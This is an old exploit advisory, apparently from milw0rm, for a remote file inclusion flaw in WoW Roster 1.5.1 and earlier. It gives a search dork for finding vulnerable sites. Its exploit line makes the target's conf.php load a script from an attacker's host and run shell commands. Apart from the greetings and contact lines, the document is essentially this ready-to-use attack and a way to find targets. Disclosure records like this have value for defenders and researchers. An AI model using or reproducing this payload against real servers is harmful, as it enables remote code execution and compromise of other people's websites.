31 lines
No EOL
1.2 KiB
Text
31 lines
No EOL
1.2 KiB
Text
--------------------------------------------------------------------------------
|
|
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
|
|
###############################################################################
|
|
Discovered By Skulmatic
|
|
-----------------------------------------------------------------------------
|
|
Affected software description :
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Application : World of Warcraft (WoW) Roster
|
|
URL : http://www.wowroster.net/
|
|
-----------------------------------------------------------------------------
|
|
|
|
dork : "wow roster version 1.5.*"
|
|
Exploit :
|
|
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls
|
|
|
|
------------------------------------------------------------------------------
|
|
|
|
greatz:
|
|
~~~~
|
|
# special to song hye kyo (for inspiration)
|
|
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
|
|
-------------------------------------------------------------------------------
|
|
|
|
Contact:
|
|
~~~~~~
|
|
Nick: skulmatic
|
|
E-mail: skulmatic[at]gmail[dot]Com
|
|
|
|
--------------------------------- [ eof ] ---------------------------------------
|
|
|
|
# milw0rm.com [2006-08-01] |